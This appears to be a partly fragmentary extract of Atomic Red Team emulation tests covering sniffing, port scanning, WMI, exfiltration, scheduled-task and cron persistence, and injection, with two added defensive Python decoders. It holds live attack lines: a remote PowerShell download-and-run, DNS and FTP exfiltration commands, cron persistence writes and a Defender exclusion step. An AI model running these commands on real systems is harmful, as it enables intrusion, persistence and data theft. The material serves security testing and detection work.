Prereq: The startup script must exist on disk at specified location ($T1037.005/src/T1037.005_agent.sh)
if [ -f $T1037.005/src/T1037.005_agent.sh ]; then exit 0; else exit 1; fi;
Description: Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
Prereq: Check if at least one of tcpdump or tshark is installed.
Description: Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
Prereq: Check if at least one of tcpdump or tshark is installed.
Description: Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
Prereq: Check if at least one of tcpdump or tshark is installed.
Description: Perform a packet capture using the Windows command prompt. This will require a host that has Wireshark/Tshark installed.
Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
Prereq: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
if (test-path "c:\program files\wireshark\tshark.exe") {exit 0} else {exit 1}
Prereq: npcap must be installed.
if (test-path "C:\Program Files\Npcap\npcap.sys") {exit 0} else {exit 1}
Description: Starts a packet capture and stores the log file as t1040.etl.
https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
Cleanup:
del %TEMP%\t1040.etl
T1040 - Network Sniffing
Windows Internal pktmon set filter
pktmon.exe filter add -p 445
Description: Selects the desired ports for packet capture.
https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
Cleanup:
pktmon filter remove
T1040 - Network Sniffing
Packet Capture macOS using /dev/bpfN with sudo
sudo /tmp/t1040_macos_pcapdemo -i en0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_macos_pcapdemo
T1040 - Network Sniffing
Filtered Packet Capture macOS using /dev/bpfN with sudo
sudo /tmp/t1040_macos_pcapdemo -f -i en0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_macos_pcapdemo
T1040 - Network Sniffing
Packet Capture FreeBSD using /dev/bpfN with sudo
sudo /tmp/t1040_freebsd_pcapdemo -i em0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_freebsd_pcapdemo
T1040 - Network Sniffing
Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
sudo /tmp/t1040_freebsd_pcapdemo -f -i em0 -t 3
Description: Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
Prereq: compile C program
exit 1
Cleanup:
rm -f /tmp/t1040_freebsd_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
sudo /tmp/t1040_linux_pcapdemo -a -t 3
Description: Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few seconds.
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/t1040_linux_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo
sudo /tmp/t1040_linux_pcapdemo -4 -p 6 -t 3
Description: Captures packets with domain=AF_INET,type=SOCK_RAW,protocol=TCP for a few seconds.
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/t1040_linux_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo
sudo /tmp/t1040_linux_pcapdemo -4 -P -p 17 -t 3
Description: Captures packets with domain=AF_INET,type=SOCK_PACKET,protocol=UDP for a few seconds.
SOCK_PACKET is "obsolete" according to the man page, but still works on Ubuntu 20.04.
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/t1040_linux_pcapdemo
T1040 - Network Sniffing
Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo
sudo /tmp/t1040_linux_pcapdemo -a -f -t 3
Description: Captures packets with domain=AF_PACKET,type=SOCK_RAW for a few seconds.
Sets a BPF filter on the socket to filter for UDP traffic.
Prereq: compile C program
if [ -f "/tmp/t1040_linux_pcapdemo" ]; then exit 0; else exit 1; fi
Description: Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
T1046 - Network Service Discovery
Port Scan
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/192.168.1.1/$port) && echo port $port is open ; done
Description: Scan ports to check for listening ports.
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Description: Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Prereq: Check if nmap command exists on the machine
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
Prereq: Check if nc command exists on the machine
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
Prereq: Check if telnet command exists on the machine
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
T1046 - Network Service Discovery
Port Scan NMap for Windows
nmap 127.0.0.1
Description: Scan ports to check for listening ports for the local host 127.0.0.1
Prereq: NMap must be installed
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
T1046 - Network Service Discovery
Port Scan using python
python "T1046\src\T1046.py" -i 127.0.0.1
Description: Scan ports to check for listening ports with python
Description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
T1046 - Network Service Discovery
WinPwn - fruit
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput
Description: Search for potentially vulnerable web apps (low hanging fruit) using the fruit function of WinPwn.
Description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
foreach ($ip in $subnetIPs) {
  foreach ($port in $ports) {
    try {
      $tcp = New-Object Net.Sockets.TcpClient
      $tcp.ConnectAsync($ip, $port).Wait(200) | Out-Null
    } catch {}
    if ($tcp.Connected) {
      $tcp.Close()
      Write-Host "Port $port is open on $ip"
    }
  }
}
} else {
  Write-Host "[Error] Invalid Inputs"
  exit 1
}
Description: Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
The connection attempts use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
Description: Availability of remote desktop services can be checked using get- cmdlet of PowerShell
T1046 - Network Service Discovery
Port Scan using nmap (Port range)
nmap -Pn -sV -p 0-65535 127.0.0.1
Description: Scan multiple ports to check for listening ports with nmap
Prereq: Check if nmap command exists on the machine
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
T1047 - Windows Management Instrumentation
WMI Reconnaissance Users
wmic useraccount get /ALL /format:csv
Description: An adversary might use WMI to list all local User Accounts.
When the test completes, local user account information should be displayed on the command line.
T1047 - Windows Management Instrumentation
WMI Reconnaissance Processes
wmic process get caption,executablepath,commandline /format:csv
Description: An adversary might use WMI to list Processes running on the compromised host.
When the test completes, the running processes should be listed on the command line.
T1047 - Windows Management Instrumentation
WMI Reconnaissance Software
wmic qfe get description,installedOn /format:csv
Description: An adversary might use WMI to list installed software hotfixes and patches.
When the test completes, there should be a list of installed patches and when they were installed.
T1047 - Windows Management Instrumentation
WMI Reconnaissance List Remote Services
wmic /node:"127.0.0.1" service where (caption like "%Spooler%")
Description: An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, service information will be displayed on the screen if the service exists.
A common feedback message is "No instance(s) Available" if the queried service is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable.
T1047 - Windows Management Instrumentation
WMI Execute Local Process
wmic process call create notepad.exe
Description: This test uses wmic.exe to execute a process on the local host.
When the test completes, a new process will be started locally. A notepad application will be started when the input is left at its default.
Cleanup:
wmic process where name='notepad.exe' delete >nul 2>&1
T1047 - Windows Management Instrumentation
WMI Execute Remote Process
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process call create notepad.exe
Description: This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
To clean up, provide the same node input as the one provided to run the test.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
Cleanup:
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process where name='notepad.exe' delete >nul 2>&1
T1047 - Windows Management Instrumentation
Create a Process using WMI Query and an Encoded Command
Description: Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand
Where the -EncodedCommand, once decoded, would resemble:
Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs' -ComputerName WORKSTATION
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test.
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
Description: This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
wmic /node:127.0.0.1 process call create "rundll32.exe \"..\ExternalPayloads\calc.dll\" StartW"
Description: This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
Prereq: DLL with function to execute must exist on disk at specified location (..\ExternalPayloads\calc.dll)
if (Test-Path "..\ExternalPayloads\calc.dll") {exit 0} else {exit 1}
Cleanup:
taskkill /f /im calculator.exe
T1047 - Windows Management Instrumentation
Application uninstall using WMIC
wmic /node:"127.0.0.1" product where "name like 'Tightvnc%%'" call uninstall
Description: Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
Description: Exfiltrate data over HTTPS using wget --post-data method
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Exfiltration Over Alternative Protocol - HTTP
{MISSING IN ATOMIC RED TEAM}
Description: A firewall rule (ipfw, pf, iptables or firewalld) will be needed to allow exfiltration on port 1337.
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Description: Exfiltration of specified file over ICMP protocol.
Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Exfiltration Over Alternative Protocol - DNS
{MISSING IN ATOMIC RED TEAM}
Description: Exfiltration of specified file over DNS protocol.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Description: Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Description: Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
MAZE FTP Upload
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://127.0.0.1/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('None', 'None')
if (test-connection -count 1 -computername "127.0.0.1" -quiet) {
  foreach($file in (dir $Dir_to_copy "*.7z")) {
    echo "Uploading $file..."
    $uri = New-Object System.Uri($ftp+$file.name)
    $web_client.UploadFile($uri, $file.FullName)
  }
} else {
  echo "FTP Server Unreachable. Please verify the server address in input args and try again."
}
Description: This test simulates the MAZE ransomware's ability to exfiltrate data via FTP.
Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server.
Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
Description: Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
Prereq: Check if the exfil package exists
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
Prereq: Check if rclone zip exists
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Python3 http.server
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
Description: An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and, if so, creates an HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
Description: Input a domain and test Exfiltration over SSH
Remote to Local
Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
Description: Input a domain and test Exfiltration over SSH
Local to Remote
Upon successful execution, tar will compress the /Users/* directory and the result will be password protected, producing `Users.tar.gz.enc` as output.
Description: DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing data to be exfiltrated over a covert channel.
!!! Test will fail without a domain under your control with A record and NS record !!!
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
Prereq: DNSExfiltrator powershell file must exist on disk at specified location (..\ExternalPayloads\dnsexfil.ps1)
if (Test-Path "..\ExternalPayloads\dnsexfil.ps1") {exit 0} else {exit 1}
T1048 - Exfiltration Over Alternative Protocol
Exfiltrate Data using DNS Queries via dig
dig @8.8.8.8 -p 53 $(echo "this is a secret info" | base64).google.com
Description: This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and making DNS queries via the dig command to a controlled DNS server.
Prereq: dig command
which dig
T1049 - System Network Connections Discovery
System Network Connections Discovery
netstat
net use
net sessions
Description: Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
T1049 - System Network Connections Discovery
System Network Connections Discovery with PowerShell
Get-NetTCPConnection
Description: Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
T1049 - System Network Connections Discovery
System Network Connections Discovery FreeBSD, Linux & MacOS
netstat
who -a
Description: Get a listing of network connections.
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Prereq: Check if netstat command exists on the machine
if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
foreach ($syntax in $syntaxList) { ..\ExternalPayloads\SharpView.exe $syntax -}
Description: Get a listing of network connections, domains, domain users, etc.
sharpview.exe, located in the bin folder, is an open-source red-team tool.
Upon successful execution, cmd.exe will execute sharpview.exe. Results will output via stdout.
Prereq: Sharpview.exe must exist on disk at specified location (..\ExternalPayloads\SharpView.exe)
if (Test-Path "..\ExternalPayloads\SharpView.exe") {exit 0} else {exit 1}
T1053.002 - Scheduled Task/Job: At
At.exe Scheduled task
at 13:20 /interactive cmd
Description: Executes cmd.exe
Note: deprecated in Windows 8+
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
T1053.002 - Scheduled Task/Job: At
At - Schedule a job
echo "echo Hello from Atomic Red Team" | at now + 1 minute
Description: This test submits a command to be run in the future by the `at` daemon.
Prereq: The `at` and `atd` executables must exist in the PATH
if [ "$(uname)" = 'FreeBSD' ]; then which at; else which at && which atd; fi;
Prereq: The `atd` daemon must be running
if [ $(uname) = 'Linux' ]; then systemctl status atd || service atd status; fi;
T1053.002 - Scheduled Task/Job: At
At - Schedule a job via kubectl in a Pod
kubectl run atomic-at-schedule --image=ubuntu --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo 'echo Hello from Atomic Red Team' | at now + 1 minute && at -l"
Description: Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon, and submits a job with `at`. The pod is deleted after execution.
Description: This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
Cleanup:
crontab /tmp/notevil
T1053.003 - Scheduled Task/Job: Cron
Cron - Add script to all cron subfolders
echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.daily/persistevil
echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.hourly/persistevil
echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.monthly/persistevil
echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" > /etc/cron.weekly/persistevil
Description: This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "echo '*/5 * * * * root echo "Hello from Atomic Red Team"' > /tmp/atomic.log" > /etc/cron.d/persistevil
Description: This test adds a script to /etc/cron.d folder configured to execute on a schedule.
Cleanup:
rm /etc/cron.d/persistevil -f
T1053.003 - Scheduled Task/Job: Cron
Cron - Add script to /var/spool/cron/crontabs/ folder
echo "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" >> /var/spool/cron/crontabs/persistevil
Description: This test adds a script to the /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Description: Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.
Description: Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
Description: Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
Description: This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run.
$xml = [System.IO.File]::ReadAllText("T1053.005\src\T1053_005_WMI.xml")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Description: Create a scheduled task that executes notepad.exe after user login from XML by leveraging the WMI class PS_ScheduledTask. Does the same thing as the Register-ScheduledTask cmdlet behind the scenes.
Prereq: File to copy must exist on disk at specified location (T1053.005\src\T1053_005_WMI.xml)
if (Test-Path "T1053.005\src\T1053_005_WMI.xml") {exit 0} else {exit 1}
Description: A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
The scheduled task will launch powershell to decode and run the command in the registry daily.
This is a persistence mechanism recently seen in use by Qakbot.
[Additional Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
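The artefact this test leaves behind is a Base64 string in a registry value plus a task action that hands it to powershell.exe, so the DFIR question is simply "what does it decode to". The helper below is an added example, not part of Atomic Red Team or the linked write-up. It handles the two encodings you will meet in practice: -EncodedCommand expects UTF-16LE, while a value built with UTF8.GetBytes() decodes as UTF-8; it also pulls the blob out of the short argument forms (-e, -ec, -enc) that powershell.exe accepts. The registry value and task action string are constructed here, not taken from the test's own XML.

```python
"""Recover a command stored as Base64 the way the test above keeps it in the
registry and passes it to powershell.exe. Added example, not ART code."""
import base64
import re

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; these short
# forms are what usually appear in scheduled-task actions. (Assumed list.)
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_blob(b64):
    """Return (encoding, text) for a Base64 blob.
    UTF-16LE ASCII text has a NUL in every odd byte; anything else is tried as UTF-8."""
    raw = base64.b64decode(b64, validate=True)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return "utf-16-le", raw.decode("utf-16-le")
    try:
        return "utf-8", raw.decode("utf-8")
    except UnicodeDecodeError:
        # Non-ASCII UTF-16 payloads fail the NUL check; fall back rather than crash.
        return "utf-16-le", raw.decode("utf-16-le", "replace")


def decode_command_line(cmdline):
    """Decode every encoded-command argument found in a task action string."""
    return [decode_blob(blob) for blob in ENC_ARG.findall(cmdline)]


# Constructed stand-ins for the registry value and the task's action string.
REG_VALUE = base64.b64encode("ping 127.0.0.1".encode("utf-16-le")).decode()
UTF8_VALUE = base64.b64encode(b"ping 127.0.0.1").decode()
TASK_ACTION = f"powershell.exe -NoP -W Hidden -enc {REG_VALUE}"

if __name__ == "__main__":
    print(decode_blob(REG_VALUE))
    print(decode_blob(UTF8_VALUE))
    print(decode_command_line(TASK_ACTION))
```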
$xml = [System.IO.File]::ReadAllText("T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml = $xml; }
Description: Create a scheduled task that executes calc.exe after user login from XML that contains the hidden setting attribute.
This technique was seen several times in TrickBot malware and also in the targeted attack campaign Industroyer2.
Prereq: File to copy must exist on disk at specified location (T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml)
if (Test-Path "T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml") {exit 0} else {exit 1}
Cleanup:
Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
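Both XML-driven tests above register a task straight from a task-definition document, and the second one relies on the Hidden setting to keep it out of the Task Scheduler UI. On disk the same XML sits under C:\Windows\System32\Tasks, so a hunt can parse those files directly. The checker below is an added example, not Atomic Red Team code: it reads Task Scheduler XML, strips the UTF-16 declaration that exported task files carry, and reports the hidden flag, the trigger types and the Exec actions, with a couple of assumed heuristics (script hosts and user-writable paths). The two XML samples are constructed here and are not the project's T1053_005_WMI.xml or T1053_05_SCTASK_HIDDEN_ATTRIB.xml, whose contents are not shown on this page.

```python
"""Flag the registration traits the XML-based scheduled-task tests above rely
on: Hidden=true, a logon/boot trigger, an Exec action. Added example, not ART
code; samples and heuristics are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumed heuristics, not an exhaustive list.
LOLBIN = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|msiexec)(\.exe)?\b", re.I)
USER_WRITABLE = re.compile(r"\\(temp|tmp|appdata|public|programdata)\\", re.I)


def audit_task_xml(xml_text):
    # schtasks /XML and Export-ScheduledTask emit UTF-16 with an XML declaration;
    # drop the declaration so str input parses whatever encoding it names.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text).strip()
    root = ET.fromstring(body)
    hidden = any((e.text or "").strip().lower() == "true"
                 for e in root.findall("t:Settings/t:Hidden", NS))
    triggers = [e.tag.split("}")[-1] for e in root.findall("t:Triggers/*", NS)]
    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        actions.append(f"{cmd} {args}".strip())
    findings = []
    if hidden:
        findings.append("Hidden=true: task is not shown in the Task Scheduler UI")
    for t in triggers:
        if t in ("LogonTrigger", "BootTrigger"):
            findings.append(f"{t}: runs without user interaction")
    for a in actions:
        if LOLBIN.search(a):
            findings.append(f"action uses a script host or LOLBin: {a}")
        if USER_WRITABLE.search(a):
            findings.append(f"action points into a user-writable path: {a}")
    return {"hidden": hidden, "triggers": triggers, "actions": actions, "findings": findings}


# Constructed: a hidden logon task launching calc.exe, as the test above describes.
SAMPLE_HIDDEN_LOGON = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>atomic red team</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Settings>
    <Hidden>true</Hidden>
    <AllowStartOnDemand>true</AllowStartOnDemand>
  </Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Windows\System32\calc.exe</Command></Exec>
  </Actions>
</Task>
"""

# Constructed: a visible daily task that hands an encoded command to PowerShell.
SAMPLE_DAILY_PS = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2022-02-07T09:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoP -W Hidden -enc cABpAG4AZwA=</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for sample in (SAMPLE_HIDDEN_LOGON, SAMPLE_DAILY_PS):
        print(audit_task_xml(sample))
```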
Description: Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered.
It will first be created to spawn cmd.exe, but modified to run notepad.exe.
Upon successful execution, powershell.exe will create a scheduled task and modify the action.
Description: Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.
This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.
For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
Prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
if (Test-Path "..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
Prereq: GhostTask.exe tool from netero1010 must exist in the ExternalPayloads directory. This tool may be quarantined by Windows Defender; disable Windows Defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"`
if (Test-Path "..\ExternalPayloads\GhostTask.exe") { exit 0} else { exit 1}
Description: Adds persistence by abusing `compmgmt.msc` via a scheduled task.
When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`).
This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
Description: Adds persistence by abusing `eventviewer.msc` via a scheduled task.
When the eventviewer console is opened, it will run a malicious payload (in this case, `calc.exe`).
Description: Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
Prereq: Check if systemd-run exists on the machine
if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi;
Description: Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
Prereq: Check if systemd-run exists on the machine
if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi;
Description: Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Prereq: kubectl must be installed
which kubectl
T1053.007 - Kubernetes Cronjob
CreateCronjob
kubectl create -f src/cronjob.yaml -n default
Description: Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Prereq: kubectl must be installed
which kubectl
Cleanup:
kubectl delete cronjob art -n default
T1055.001 - Process Injection: Dynamic-link Library Injection
Description: Windows 10 utility to inject DLLs.
Upon successful execution, powershell.exe will download T1055.dll to disk. PowerShell will then spawn mavinject.exe to inject T1055.dll into a process.
With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
Prereq: Utility to inject must exist on disk at specified location (T1055.001\src\x64\T1055.001.dll)
if (Test-Path "T1055.001\src\x64\T1055.001.dll") {exit 0} else {exit 1}
T1055.001 - Process Injection: Dynamic-link Library Injection
WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
Description: This test injects a portable executable into a remote Notepad process memory using Portable Executable Injection and base-address relocation techniques. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds.
